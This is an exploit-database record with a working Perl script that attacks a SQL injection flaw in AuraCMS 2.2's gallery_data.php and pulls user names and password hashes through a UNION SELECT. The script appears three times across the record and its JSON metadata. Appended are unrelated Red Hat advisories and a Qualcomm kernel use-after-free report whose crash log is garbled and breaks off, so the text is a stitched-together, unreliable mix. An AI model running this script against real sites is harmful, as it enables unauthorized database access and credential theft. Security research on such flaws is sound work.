ID 1337DAY-ID-2630
Type zdt
Reporter DNX
Modified 2008-02-12T00:00:00
Description
Exploit for unknown platform in category web applications
===========================================================
AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit
===========================================================
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;
#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case 'detail':
# 174: if (isset($_GET['id'])){
# 175: $id = $_GET['id'];
# 176: $albums = $_GET['albums'];
#
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install gallery update!
#
if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------------oOO---(_)---OOo--------------------";
print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";
print "\n | (works only with magic quotes = off) |";
print "\n | coded by DNX |";
print "\n --------------------------------------------------------";
print "\n[!] Usage......: perl aura.pl [Host] [Path] <Options>";
print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";
print "\n[!] Options....:";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, "p=s");
print "[!] Exploiting...\n";
exploit();
print "\n[!] Exploit done\n";
sub exploit
{
my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes";
my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php";
my $ua = LWP::UserAgent->new;
my $cookie = HTTP::Cookies->new();
my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
my $res = "";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
###############
# exist file? #
###############
$res = $ua->get($url2);
if(!$res->is_success)
{
die("[!] Failed, file not found\n");
}
##########################
# get cookie from server #
##########################
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$ua->get($url2);
$res = $ua->get($url2);
######################
# check magic quotes #
######################
$url2 .= "?action=detail&id=&image=&albums='";
$res = $ua->get($url2);
$content = $res->content;
if($content =~ /,\"albums\":\[\"\\\\'\"],/)
{
die("[!] Failed, magic quotes on\n")
}
##############
# get hashes #
##############
$url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";
$res = $ua->get($url2);
$content = $res->content;
my @cont = split(/{\"files\"/, $content);
foreach (@cont)
{
if($_ =~ /$regexp/)
{
print "$1 $3\n";
}
}
}
# 0day.today [2018-04-15] #
{"hash": "dd33587c944ce84dc0a2676cd7a1127362dfc26ab5d6039f351f8bd58ad17b21", "id": "1337DAY-ID-2630", "lastseen": "2018-04-15T01:53:36", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "9f37cd4417a90cc80ab48f539ba90beb", "key": "href"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "modified"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b00776def4340d953ea7a51e7f43bd97", "key": "reporter"}, {"hash": "f32527bdbfad3640aef08a65c3546fdb", "key": "sourceData"}, {"hash": "5b565e1dda40599b6a4ce6e86d9ccd65", "key": "sourceHref"}, {"hash": "27a24f87136150c3df6a679ea1af13a0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2018-04-15T01:53:36"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46941"]}, {"type": "zdt", "idList": ["1337DAY-ID-32820", "1337DAY-ID-30990"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4262"]}, {"type": "cve", "idList": ["CVE-2017-5753"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_RCE.NASL", "REDHAT-RHSA-2016-2107.NASL", "REDHAT-RHSA-2016-2110.NASL", "OPENSUSE-2016-1211.NASL"]}, {"type": "redhat", "idList": ["RHSA-2017:0372", "RHSA-2016:2110", "RHSA-2016:2107"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2673-1", "SUSE-SU-2016:2638-1", "SUSE-SU-2016:2637-1", "SUSE-SU-2016:2635-1", "SUSE-SU-2016:2634-1", "SUSE-SU-2016:2631-1", "SUSE-SU-2016:2630-1", "SUSE-SU-2016:2629-1"]}], "modified": "2018-04-15T01:53:36"}, "vulnersScore": 4.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/2630", "description": "Exploit for unknown platform in category web applications", "title": "AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit", "history": [{"bulletin": {"hash": "97ccdfbc1913ddd3acdc6994f1d0b26de85f85b735318972223b997c3096ff76", "id": "1337DAY-ID-2630", "lastseen": "2016-04-20T02:25:57", "enchantments": {"score": {"value": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "modified": "2016-04-20T02:25:57"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "27a24f87136150c3df6a679ea1af13a0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b00776def4340d953ea7a51e7f43bd97", "key": "reporter"}, {"hash": "c5ec04558ce8d4c629c965a10e7546ca", "key": "sourceData"}, {"hash": "1bae08052bd1ce37bcbd209847c8d1e3", "key": "sourceHref"}, {"hash": "aa64a3e899e85e11b929cbc2c18088a3", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2630", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\nAuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit\r\n===========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\nuse Getopt::Long;\r\n\r\n#\r\n# [!] Discovered.: DNX\r\n# [!] Vendor.....: http://www.auracms.org\r\n# [!] Detected...: 19.01.2008\r\n# [!] Reported...: 25.01.2008\r\n# [!] Response...: 30.01.2008\r\n#\r\n# [!] Background.: AuraCMS is a CMS based on PHP and SQL\r\n#\r\n# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173\r\n#\r\n# 173: case 'detail':\r\n# 174: if (isset($_GET['id'])){\r\n# 175: $id = $_GET['id'];\r\n# 176: $albums = $_GET['albums'];\r\n#\r\n# 200: $query = mysql_query (\"SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage\");\r\n#\r\n# [!] Solution...: Install gallery update!\r\n#\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n ---------------------oOO---(_)---OOo--------------------\";\r\n print \"\\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |\";\r\n print \"\\n | (works only with magic quotes = off) |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------------\";\r\n print \"\\n[!] Usage......: perl aura.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/\";\r\n print \"\\n[!] Options....:\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy %options = ();\r\nGetOptions(\\%options, \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nexploit();\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub exploit\r\n{\r\n my $url1 = \"http://\".$host.$path.\"index.php?pilih=gallery&mod=yes\";\r\n my $url2 = \"http://\".$host.$path.\"mod/gallery/ajax/gallery_data.php\";\r\n my $ua = LWP::UserAgent->new;\r\n my $cookie = HTTP::Cookies->new();\r\n my $regexp = \":\\\"(.*?)\\\",\\\"name\\\"(.*)([a-fA-F0-9]{32})\";\r\n my $res = \"\";\r\n \r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n \r\n ###############\r\n # exist file? #\r\n ###############\r\n $res = $ua->get($url2);\r\n if(!$res->is_success)\r\n {\r\n die(\"[!] Failed, file not found\\n\");\r\n }\r\n \r\n ##########################\r\n # get cookie from server #\r\n ##########################\r\n $res = $ua->get($url1);\r\n $cookie->extract_cookies($res);\r\n $ua->cookie_jar($cookie);\r\n $ua->get($url2);\r\n $res = $ua->get($url2);\r\n \r\n ######################\r\n # check magic quotes #\r\n ######################\r\n $url2 .= \"?action=detail&id=&image=&albums='\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n if($content =~ /,\\\"albums\\\":\\[\\\"\\\\\\\\'\\\"],/)\r\n {\r\n die(\"[!] Failed, magic quotes on\\n\")\r\n }\r\n \r\n ##############\r\n # get hashes #\r\n ##############\r\n $url2 .= \"%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n my @cont = split(/{\\\"files\\\"/, $content);\r\n foreach (@cont)\r\n {\r\n if($_ =~ /$regexp/)\r\n {\r\n print \"$1 $3\\n\";\r\n }\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2008-02-12T00:00:00", "references": [], "reporter": "DNX", "modified": "2008-02-12T00:00:00", "href": "http://0day.today/exploit/description/2630"}, "lastseen": "2016-04-20T02:25:57", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\nAuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit\r\n===========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\nuse Getopt::Long;\r\n\r\n#\r\n# [!] Discovered.: DNX\r\n# [!] Vendor.....: http://www.auracms.org\r\n# [!] Detected...: 19.01.2008\r\n# [!] Reported...: 25.01.2008\r\n# [!] Response...: 30.01.2008\r\n#\r\n# [!] Background.: AuraCMS is a CMS based on PHP and SQL\r\n#\r\n# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173\r\n#\r\n# 173: case 'detail':\r\n# 174: if (isset($_GET['id'])){\r\n# 175: $id = $_GET['id'];\r\n# 176: $albums = $_GET['albums'];\r\n#\r\n# 200: $query = mysql_query (\"SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage\");\r\n#\r\n# [!] Solution...: Install gallery update!\r\n#\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n ---------------------oOO---(_)---OOo--------------------\";\r\n print \"\\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |\";\r\n print \"\\n | (works only with magic quotes = off) |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------------\";\r\n print \"\\n[!] Usage......: perl aura.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/\";\r\n print \"\\n[!] Options....:\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy %options = ();\r\nGetOptions(\\%options, \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nexploit();\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub exploit\r\n{\r\n my $url1 = \"http://\".$host.$path.\"index.php?pilih=gallery&mod=yes\";\r\n my $url2 = \"http://\".$host.$path.\"mod/gallery/ajax/gallery_data.php\";\r\n my $ua = LWP::UserAgent->new;\r\n my $cookie = HTTP::Cookies->new();\r\n my $regexp = \":\\\"(.*?)\\\",\\\"name\\\"(.*)([a-fA-F0-9]{32})\";\r\n my $res = \"\";\r\n \r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n \r\n ###############\r\n # exist file? #\r\n ###############\r\n $res = $ua->get($url2);\r\n if(!$res->is_success)\r\n {\r\n die(\"[!] Failed, file not found\\n\");\r\n }\r\n \r\n ##########################\r\n # get cookie from server #\r\n ##########################\r\n $res = $ua->get($url1);\r\n $cookie->extract_cookies($res);\r\n $ua->cookie_jar($cookie);\r\n $ua->get($url2);\r\n $res = $ua->get($url2);\r\n \r\n ######################\r\n # check magic quotes #\r\n ######################\r\n $url2 .= \"?action=detail&id=&image=&albums='\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n if($content =~ /,\\\"albums\\\":\\[\\\"\\\\\\\\'\\\"],/)\r\n {\r\n die(\"[!] Failed, magic quotes on\\n\")\r\n }\r\n \r\n ##############\r\n # get hashes #\r\n ##############\r\n $url2 .= \"%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n my @cont = split(/{\\\"files\\\"/, $content);\r\n foreach (@cont)\r\n {\r\n if($_ =~ /$regexp/)\r\n {\r\n print \"$1 $3\\n\";\r\n }\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-15] #", "published": "2008-02-12T00:00:00", "references": [], "reporter": "DNX", "modified": "2008-02-12T00:00:00", "href": "https://0day.today/exploit/description/2630"}
{"redhat": [{"lastseen": "2019-08-13T18:45:43", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap buffer overflow in HyperLogLog triggered by malicious client (CVE-2019-10192)\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: Code execution in redis-cli via crafted command line arguments (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-25T20:02:37", "published": "2019-07-25T19:55:00", "id": "RHSA-2019:1860", "href": "https://access.redhat.com/errata/RHSA-2019:1860", "type": "redhat", "title": "(RHSA-2019:1860) Important: rh-redis32-redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-10-10T14:56:53", "bulletinFamily": "unix", "description": "The kernel-aarch64 package contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path, as an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. (CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.\n\nBug Fix(es):\n\n* Previously, the operating system did not support the Mellanox ConnectX-4 PCIe Network Interface Controllers (NIC) in Ethernet mode. This update enables Ethernet support in the mlx5 driver. As a result, the Mellanox ConnectX-4 PCIe NICs now work in Ethernet mode as expected. (BZ#1413108)\n\n* On the Qualcomm Datacenter Technologies server platform with Qualcomm Datacenter Technologies Centriq 2400 CPU (QDF2400v1) memory accesses sometimes allocated Translation Lookaside Buffer (TLB) entries using an incorrect Address Space ID (ASID). This could consequently result in memory corruption and crashes under certain conditions. The underlying source code has been modified to handle the TTBRx_EL1[ASID] and TTBRx_EL1[BADDR] fields separately using a reserved ASID, and the described problem no longer occurs. (BZ#1421765)", "modified": "2017-10-10T18:15:31", "published": "2017-03-02T20:22:03", "id": "RHSA-2017:0372", "href": "https://access.redhat.com/errata/RHSA-2017:0372", "type": "redhat", "title": "(RHSA-2017:0372) Important: kernel-aarch64 security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-12-11T13:32:28", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path; As an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. (CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.", "modified": "2018-03-19T16:29:53", "published": "2016-10-26T16:09:58", "id": "RHSA-2016:2110", "href": "https://access.redhat.com/errata/RHSA-2016:2110", "type": "redhat", "title": "(RHSA-2016:2110) Important: kernel-rt security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T13:33:12", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path; As an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. (CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.", "modified": "2018-06-07T08:58:33", "published": "2016-10-26T12:56:09", "id": "RHSA-2016:2107", "href": "https://access.redhat.com/errata/RHSA-2016:2107", "type": "redhat", "title": "(RHSA-2016:2107) Important: kernel-rt security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2019-05-29T12:27:54", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-29T00:00:00", "published": "2019-05-29T00:00:00", "id": "EDB-ID:46941", "href": "https://www.exploit-db.com/exploits/46941", "type": "exploitdb", "title": "Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of\r\nhttps://android.googlesource.com/kernel/msm (and possibly others):\r\n\r\nWhen kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable\r\nentry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages\r\nas dirty using the function set_page_dirty(). This function first loads\r\npage->mapping using page_mapping(), then calls the function pointer\r\nmapping->a_ops->set_page_dirty.\r\n\r\nThe bug is that, as explained in upstream commit e92bb4dd9673\r\n( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),\r\nthe mapping of a page can be freed concurrently unless it is protected somehow\r\n(e.g. by holding the page lock, or by holding a reference to the mapping).\r\nFor callers who don't hold any such lock or reference, set_page_dirty_lock() is\r\nprovided to safely mark a page as dirty:\r\n\r\n==================================\r\n/*\r\n * set_page_dirty() is racy if the caller has no reference against\r\n * page->mapping->host, and if the page is unlocked. This is because another\r\n * CPU could truncate the page off the mapping and then free the mapping.\r\n *\r\n * Usually, the page _is_ locked, or the caller is a user-space process which\r\n * holds a reference on the inode by having an open file.\r\n *\r\n * In other cases, the page should be locked before running set_page_dirty().\r\n */\r\nint set_page_dirty_lock(struct page *page)\r\n{\r\n int ret;\r\n\r\n lock_page(page);\r\n ret = set_page_dirty(page);\r\n unlock_page(page);\r\n return ret;\r\n}\r\n==================================\r\n\r\n\r\nTo reproduce on a Pixel 2 (walleye):\r\n\r\n - Check out the tree specified above.\r\n - Enable KASAN in the kernel config.\r\n - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the\r\n race window much bigger.\r\n - Build and boot the kernel.\r\n - Build the attached poc.c with\r\n `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.\r\n - Run the PoC on the device (adb push, then run from adb shell).\r\n\r\nYou should see a kernel crash like this; note KASAN's report of a UAF in\r\nset_page_dirty():\r\n\r\n==================================\r\n<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0\r\n<3>[ 447.372706] c3 2621 ==================================================================\r\n<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0\r\n<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621\r\n<3>[ 447.387059] c3 2621 \r\n<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.418479] c3 2621 Call trace:\r\n<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4\r\n<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c\r\n<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc\r\n<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340\r\n<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340\r\n<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90\r\n<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0\r\n<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218\r\n<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c\r\n<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c\r\n<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718\r\n<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.497696] c3 2621 \r\n<3>[ 447.503818] c3 2621 Allocated by task 2684:\r\n<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124\r\n<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4\r\n<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234\r\n<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0\r\n<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8\r\n<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00\r\n<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230\r\n<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404\r\n<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188\r\n<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4\r\n<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18\r\n<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>\r\n^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28\r\n<3>[ 447.594909] c3 2621 \r\n<3>[ 447.599065] c3 2621 Freed by task 36:\r\n<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0\r\n<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8\r\n<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20\r\n<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264\r\n<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.645765] c3 2621 \r\n<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000\r\n<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048\r\n<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of\r\n<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)\r\n<3>[ 447.667170] c3 2621 The buggy address belongs to the page:\r\n<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000\r\n<1>[ 447.686392] c3 2621 pgd = 0000000000000000\r\n<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000\r\n<4>[ 447.706506] c3 2621 ------------[ cut here ]------------\r\n<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]\r\n<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP\r\n<4>[ 447.719517] c3 2621 Modules linked in:\r\n<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)\r\n<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000\r\n<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0\r\n<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18\r\n<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5\r\n<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60\r\n<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 \r\n<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 \r\n<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 \r\n<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001 \r\n<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 